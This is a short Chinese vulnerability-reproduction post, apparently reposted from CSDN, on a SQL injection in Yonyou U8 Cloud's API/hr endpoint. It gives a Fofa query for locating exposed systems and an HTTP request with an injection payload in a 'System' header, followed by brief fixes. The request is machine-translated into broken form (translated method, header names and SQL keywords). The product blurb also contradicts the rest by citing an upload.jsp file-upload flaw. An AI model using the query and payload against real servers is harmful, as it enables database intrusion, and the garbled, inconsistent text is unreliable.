免责声明:
本文内容旨在提供有关特定漏洞或安全漏洞的信息,帮助用户更好地了解潜在风险。披露此类信息的目的是为了提高网络安全意识和技术进步,并不用于任何恶意目的。读者应了解,如果利用本文中提到的漏洞信息或执行相关测试,可能会违反某些法律、法规或服务协议。同时,未经授权访问系统、网络或应用程序可能会导致法律责任和其他严重后果。作者对读者根据本文内容所采取的任何行动或结果不承担任何责任。读者在使用本文提供的信息时必须遵守适用的法律、法规及相关服务协议,并自行承担一切风险和责任。
产品简介
U8云注重企业内部管控,管理规范、高效、协作、透明。云模式、低成本、快速部署、开箱即用,使企业无需投资硬件或软件即可快速构建企业管理架构。通过与云服务链接,您可以创新业务和服务模式。该产品的upload.jsp存在允许上传任意文件的漏洞。
漏洞描述
用友U8 Cloud API/hr接口存在SQL注入漏洞,攻击者可利用该漏洞获取服务器数据库权限。
网络空间测绘
Fofa
app=\’用友-U8-云\’
漏洞复现
获取/u8cloud/api/hr HTTP/1.1
主机: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (Maverick) Firefox/3.6.10
Cache-Control: 无缓存
关闭连接:
Pragma: 无缓存
System: -1\’ 或1=(@@版本)–+-
不安全的升级请求: 1
Accept-Encoding: gzip、deflate、br
修复建议
1. 如有必要,阻止公共网络访问系统。
2. 通过防火墙等安全设备配置访问策略和白名单访问。
3. 将您的产品升级到最新版本。
#【漏洞复现】以上用友U8相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92647.html